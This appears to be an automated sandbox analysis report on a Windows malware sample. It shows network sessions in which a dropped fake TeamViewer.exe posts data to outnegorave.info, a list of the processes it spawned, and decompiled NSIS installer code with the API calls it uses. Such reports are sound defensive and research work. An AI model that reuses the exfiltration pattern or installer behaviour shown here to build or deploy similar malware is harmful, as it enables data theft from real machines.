                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Uk4xUJSb82XHn%2BPd%2F2ObLeDWOCSDzYadeWCDROZejiDEgioYH3EqGxaJu8nj7SulPtttBGoqnBjd3bO0OvJZ736Z1BhiKzS3hPTQfhQGOWcZpDpJwKD5KFx4J1VzEbygQta"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1bcfe6d7f4ec1-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.6  49834        172.67.205.33   443               C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp                kBytes transferred  Direction  Data
2021-09-15 12:09:06 UTC  86                  OUT        POST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 90555
                                                                                                                      Content-Type: multipart/form-data; boundary=--------2341619378
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
2021-09-15 12:09:08 UTC  175                 IN         HTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:09:08 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=1ff005bf053274c8a139f292716a4c6a768fa2a22f3e2fadac5c81cd183e83b3; expires=Thu, 15-Sep-2022 12:09:06 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x887YJH4ElMCRx5jXS5zp7w2i9CCz2a7gNC3SmSP0jfXvX1CBsLZHCBBCZCuGLC7llR1s1BULe1hls%2BFVNabz8eMo77mRp3szhth%2BuRkzXPnYaiqdhll3KvKSXGGvgzu6mP6"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1be891a6a4e86-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.6  49839        172.67.205.33   443               C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp                kBytes transferred  Direction  Data
2021-09-15 12:10:08 UTC  176                 OUT        POST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 86397
                                                                                                                      Content-Type: multipart/form-data; boundary=--------1750076427
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2021-09-15 12:10:08 UTC | 176 | OUT | Data Ascii:
                                                                                                                      ----------1750076427
                                                                                                                      Content-Disposition: form-data; name="k"
                                                                                                                      Content-Type: text/plain
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      2021-09-15 12:10:08 UTC | 261 | OUT | Data Ascii: ----------1750076427--
                                                                                                                      2021-09-15 12:10:18 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:10:18 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=f4b2fe0e693337d31e5a414d614f56856b1c8f2532f060351f24f1a8e78bef0f; expires=Thu, 15-Sep-2022 12:10:08 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HEO3VrQh%2FvsTQW6Ij0CiQ7HlUyvWT4dITU60tYAYAZNimIVLNAITa%2F0OfXSbs2EwB%2FgZldrqHYIcjCi1UnLEk%2Ff8e75Y8OV5XkBDyWgkrRa1n%2FGmG9sOa5gg7ewy%2FQkW21zQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1c00cbaeed729-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:10:18 UTC | 262 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Start time:14:07:31
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:14:07:32
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\Desktop\77Etc0bR2v.exe'
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1828192 bytes
                                                                                                                      MD5 hash:E71E3B995477081569ED357E4D403666
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:14:07:35
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 0%, Metadefender
                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:14:07:47
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:14:07:55
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:14:08:00
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
                                                                                                                      Imagebase:0x890000
                                                                                                                      File size:44520 bytes
                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:14:08:09
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:14:08:11
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:14:08:19
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:14:08:20
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:14:08:19
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:14:08:27
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:4375848 bytes
                                                                                                                      MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      General

                                                                                                                      Start time:14:08:49
                                                                                                                      Start date:15/09/2021
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff6b7590000
                                                                                                                      File size:51288 bytes
                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                        Executed Functions

                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			_entry_() {
                                                                                                                        				struct _SHFILEINFO _v360;
                                                                                                                        				char _v372;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v376;
                                                                                                                        				int _v380;
                                                                                                                        				CHAR* _v384;
                                                                                                                        				CHAR* _v388;
                                                                                                                        				int _v392;
                                                                                                                        				intOrPtr _v396;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v404;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _v412;
                                                                                                                        				void* _v428;
                                                                                                                        				intOrPtr _t36;
                                                                                                                        				CHAR* _t41;
                                                                                                                        				char* _t44;
                                                                                                                        				signed int _t46;
                                                                                                                        				void* _t50;
                                                                                                                        				int _t52;
                                                                                                                        				signed int _t54;
                                                                                                                        				signed int _t57;
                                                                                                                        				int _t58;
                                                                                                                        				signed int _t62;
                                                                                                                        				void* _t80;
                                                                                                                        				void* _t89;
                                                                                                                        				void* _t91;
                                                                                                                        				char* _t96;
                                                                                                                        				signed int _t97;
                                                                                                                        				void* _t98;
                                                                                                                        				signed int _t99;
                                                                                                                        				signed int _t100;
                                                                                                                        				signed int _t103;
                                                                                                                        				CHAR* _t105;
                                                                                                                        				signed int _t106;
                                                                                                                        				intOrPtr _t120;
                                                                                                                        
                                                                                                                        				_v376 = 0;
                                                                                                                        				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                        				_t99 = 0;
                                                                                                                        				_v380 = 0x20;
                                                                                                                        				 *0x407030();
                                                                                                                        				SetErrorMode(0x8001); // executed
                                                                                                                        				_t36 =  *0x40727c(0); // executed
                                                                                                                        				 *0x423f58 = _t36;
                                                                                                                        				 *0x423ea4 = E00405E88(8);
                                                                                                                        				SHGetFileInfo(0x41f458, 0,  &_v360, 0x160, 0); // executed
                                                                                                                        				E00405B66(0x4236a0, "NSIS Error");
                                                                                                                        				_t41 = GetCommandLineA();
                                                                                                                        				_t96 = "\"C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe\" ";
                                                                                                                        				E00405B66(_t96, _t41);
                                                                                                                        				 *0x423ea0 = GetModuleHandleA(0);
                                                                                                                        				_t44 = _t96;
                                                                                                                        				if("\"C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe\" " == 0x22) {
                                                                                                                        					_v384 = 0x22;
                                                                                                                        					_t44 =  &M00429001;
                                                                                                                        				}
                                                                                                                        				_t46 = CharNextA(E00405684(_t44, _v384));
                                                                                                                        				_v384 = _t46;
                                                                                                                        				while(1) {
                                                                                                                        					_t91 =  *_t46;
                                                                                                                        					_t109 = _t91;
                                                                                                                        					if(_t91 == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					__eflags = _t91 - 0x20;
                                                                                                                        					if(_t91 != 0x20) {
                                                                                                                        						L5:
                                                                                                                        						__eflags =  *_t46 - 0x22;
                                                                                                                        						_v384 = 0x20;
                                                                                                                        						if( *_t46 == 0x22) {
                                                                                                                        							_t46 = _t46 + 1;
                                                                                                                        							__eflags = _t46;
                                                                                                                        							_v384 = 0x22;
                                                                                                                        						}
                                                                                                                        						__eflags =  *_t46 - 0x2f;
                                                                                                                        						if( *_t46 != 0x2f) {
                                                                                                                        							L15:
                                                                                                                        							_t46 = E00405684(_t46, _v384);
                                                                                                                        							__eflags =  *_t46 - 0x22;
                                                                                                                        							if(__eflags == 0) {
                                                                                                                        								_t46 = _t46 + 1;
                                                                                                                        								__eflags = _t46;
                                                                                                                        							}
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							_t46 = _t46 + 1;
                                                                                                                        							__eflags =  *_t46 - 0x53;
                                                                                                                        							if( *_t46 == 0x53) {
                                                                                                                        								__eflags = ( *(_t46 + 1) | 0x00000020) - 0x20;
                                                                                                                        								if(( *(_t46 + 1) | 0x00000020) == 0x20) {
                                                                                                                        									_t99 = _t99 | 0x00000002;
                                                                                                                        									__eflags = _t99;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							__eflags =  *_t46 - 0x4352434e;
                                                                                                                        							if( *_t46 == 0x4352434e) {
                                                                                                                        								__eflags = ( *(_t46 + 4) | 0x00000020) - 0x20;
                                                                                                                        								if(( *(_t46 + 4) | 0x00000020) == 0x20) {
                                                                                                                        									_t99 = _t99 | 0x00000004;
                                                                                                                        									__eflags = _t99;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							__eflags =  *((intOrPtr*)(_t46 - 2)) - 0x3d442f20;
                                                                                                                        							if( *((intOrPtr*)(_t46 - 2)) == 0x3d442f20) {
                                                                                                                        								 *((intOrPtr*)(_t46 - 2)) = 0;
                                                                                                                        								__eflags = _t46 + 2;
                                                                                                                        								E00405B66(0x429400, _t46 + 2);
                                                                                                                        								L20:
                                                                                                                        								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                                                                                        								GetTempPathA(0x400, _t105);
                                                                                                                        								_t50 = E00403208(_t109);
                                                                                                                        								_t110 = _t50;
                                                                                                                        								if(_t50 != 0) {
                                                                                                                        									L22:
                                                                                                                        									DeleteFileA("1033"); // executed
                                                                                                                        									_t52 = E00402C72(_t111, _t99); // executed
                                                                                                                        									_v392 = _t52;
                                                                                                                        									if(_t52 != 0) {
                                                                                                                        										L32:
                                                                                                                        										ExitProcess(); // executed
                                                                                                                        										 *0x407280(); // executed
                                                                                                                        										if(_v384 == 0) {
                                                                                                                        											__eflags =  *0x423f34;
                                                                                                                        											if( *0x423f34 != 0) {
                                                                                                                        												_t106 = E00405E88(3);
                                                                                                                        												_t100 = E00405E88(4);
                                                                                                                        												_t57 = E00405E88(5);
                                                                                                                        												__eflags = _t106;
                                                                                                                        												_t97 = _t57;
                                                                                                                        												if(_t106 != 0) {
                                                                                                                        													__eflags = _t100;
                                                                                                                        													if(_t100 != 0) {
                                                                                                                        														__eflags = _t97;
                                                                                                                        														if(_t97 != 0) {
                                                                                                                        															_t62 =  *_t106(GetCurrentProcess(), 0x28,  &_v372);
                                                                                                                        															__eflags = _t62;
                                                                                                                        															if(_t62 != 0) {
                                                                                                                        																 *_t100(0, "SeShutdownPrivilege",  &_v376);
                                                                                                                        																_v392 = 1;
                                                                                                                        																_v380 = 2;
                                                                                                                        																 *_t97(_v396, 0,  &_v392, 0, 0, 0);
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												_t58 = ExitWindowsEx(2, 0);
                                                                                                                        												__eflags = _t58;
                                                                                                                        												if(_t58 == 0) {
                                                                                                                        													E0040140B(9);
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											_t54 =  *0x423f4c;
                                                                                                                        											__eflags = _t54 - 0xffffffff;
                                                                                                                        											if(_t54 != 0xffffffff) {
                                                                                                                        												_v376 = _t54;
                                                                                                                        											}
                                                                                                                        											ExitProcess(_v376);
                                                                                                                        										}
                                                                                                                        										E00405427(_v384, 0x200010);
                                                                                                                        										ExitProcess(2);
                                                                                                                        									}
                                                                                                                        									if( *0x423ebc == 0) {
                                                                                                                        										L31:
                                                                                                                        										 *0x423f4c =  *0x423f4c | 0xffffffff;
                                                                                                                        										_v380 = E004036AF();
                                                                                                                        										goto L32;
                                                                                                                        									}
                                                                                                                        									_t103 = E00405684(_t96, 0);
                                                                                                                        									while(_t103 >= _t96) {
                                                                                                                        										__eflags =  *_t103 - 0x3d3f5f20;
                                                                                                                        										if(__eflags == 0) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										_t103 = _t103 - 1;
                                                                                                                        										__eflags = _t103;
                                                                                                                        									}
                                                                                                                        									_t115 = _t103 - _t96;
                                                                                                                        									_v388 = "Error launching installer";
                                                                                                                        									if(_t103 < _t96) {
                                                                                                                        										_push("~nsu.tmp");
                                                                                                                        										_push(_t105);
                                                                                                                        										L00405B82();
                                                                                                                        										_push("C:\\Users\\engineer\\Desktop");
                                                                                                                        										_push(_t105);
                                                                                                                        										if( *0x4070f0() == 0) {
                                                                                                                        											goto L32;
                                                                                                                        										}
                                                                                                                        										CreateDirectoryA(_t105, 0);
                                                                                                                        										SetCurrentDirectoryA(_t105);
                                                                                                                        										_t120 =  *0x429400; // 0x0
                                                                                                                        										if(_t120 == 0) {
                                                                                                                        											E00405B66(0x429400, "C:\\Users\\engineer\\Desktop");
                                                                                                                        										}
                                                                                                                        										E00405B66(0x424000, _v392);
                                                                                                                        										 *0x424400 = 0x41;
                                                                                                                        										_t98 = 0x1a;
                                                                                                                        										do {
                                                                                                                        											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
                                                                                                                        											DeleteFileA(0x41f058);
                                                                                                                        											if(_v412 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\77Etc0bR2v.exe", 0x41f058, 1) != 0) {
                                                                                                                        												_push(0);
                                                                                                                        												_push(0x41f058);
                                                                                                                        												E004058B4();
                                                                                                                        												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
                                                                                                                        												_t80 = E004053C6(0x41f058);
                                                                                                                        												if(_t80 != 0) {
                                                                                                                        													CloseHandle(_t80);
                                                                                                                        													_v412 = 0;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											 *0x424400 =  *0x424400 + 1;
                                                                                                                        											_t98 = _t98 - 1;
                                                                                                                        										} while (_t98 != 0);
                                                                                                                        										_push(0);
                                                                                                                        										_push(_t105);
                                                                                                                        										E004058B4();
                                                                                                                        										goto L32;
                                                                                                                        									}
                                                                                                                        									 *_t103 = 0;
                                                                                                                        									_t104 = _t103 + 4;
                                                                                                                        									if(E0040573A(_t115, _t103 + 4) == 0) {
                                                                                                                        										goto L32;
                                                                                                                        									}
                                                                                                                        									E00405B66(0x429400, _t104);
                                                                                                                        									E00405B66("C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer", _t104);
                                                                                                                        									_v404 = 0;
                                                                                                                        									goto L31;
                                                                                                                        								}
                                                                                                                        								GetWindowsDirectoryA(_t105, 0x3fb);
                                                                                                                        								_push("\\Temp");
                                                                                                                        								_push(_t105);
                                                                                                                        								L00405B82();
                                                                                                                        								_t89 = E00403208(_t110);
                                                                                                                        								_t111 = _t89;
                                                                                                                        								if(_t89 == 0) {
                                                                                                                        									goto L32;
                                                                                                                        								}
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						goto L4;
                                                                                                                        					}
                                                                                                                        					do {
                                                                                                                        						L4:
                                                                                                                        						_t46 = _t46 + 1;
                                                                                                                        						__eflags =  *_t46 - 0x20;
                                                                                                                        					} while ( *_t46 == 0x20);
                                                                                                                        					goto L5;
                                                                                                                        				}
                                                                                                                        				goto L20;
                                                                                                                        			}




































                                                                                                                        0x00403500
                                                                                                                        0x0040350d
                                                                                                                        0x00403513
                                                                                                                        0x00403513
                                                                                                                        0x00403516
                                                                                                                        0x00403517
                                                                                                                        0x00403518
                                                                                                                        0x00000000
                                                                                                                        0x00403518
                                                                                                                        0x004033ef
                                                                                                                        0x004033f1
                                                                                                                        0x004033fc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403404
                                                                                                                        0x0040340f
                                                                                                                        0x00403414
                                                                                                                        0x00000000
                                                                                                                        0x00403414
                                                                                                                        0x00403390
                                                                                                                        0x00403396
                                                                                                                        0x0040339b
                                                                                                                        0x0040339c
                                                                                                                        0x004033a1
                                                                                                                        0x004033a6
                                                                                                                        0x004033a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004033a8
                                                                                                                        0x00000000
                                                                                                                        0x00403345
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004032f9
                                                                                                                        0x004032f9
                                                                                                                        0x004032f9
                                                                                                                        0x004032fa
                                                                                                                        0x004032fa
                                                                                                                        0x00000000
                                                                                                                        0x004032f9
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • 7414E7F0.COMCTL32 ref: 0040325B
                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        • SHGetFileInfo.SHELL32(0041F458,00000000,?,00000160,00000000), ref: 00403295
                                                                                                                          • Part of subcall function 00405B66: lstrcpyn.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                                        • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,00000000), ref: 004032BD
                                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,00000020), ref: 004032E8
                                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                                                        • lstrcat.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 00403428
                                                                                                                        • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                                        • lstrcat.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 00403459
                                                                                                                        • lstrcmpi.KERNEL32 ref: 00403465
                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                                                        • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\77Etc0bR2v.exe,0041F058,00000001), ref: 004034D6
                                                                                                                        • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                                        • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFileProcess$DirectoryHandle$CurrentDeleteModuleWindowslstrcat$7414AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
